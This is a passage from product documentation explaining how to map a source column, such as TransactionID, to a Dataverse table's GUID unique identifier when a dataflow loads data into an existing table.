advanced use cases where leveraging the primary key of a table is desirable, for
example, integrating data with external sources while keeping the same primary key
values in both the external table and Dataverse table.

7 Note

This capability is only available when loading data to existing tables.


The unique identifier field only accepts a string containing GUID values, any
other data type or value will cause record creation to fail.

To take advantage of a table’s unique identifier field, select Load to existing table in the
Map Tables page while authoring a dataflow. In the example shown in the image below,
we would like to load data into the CustomerTransactions table, and use the
TransactionID column from the data source as the unique identifier of the table.

You'll notice that in the Select key dropdown, the unique identifier—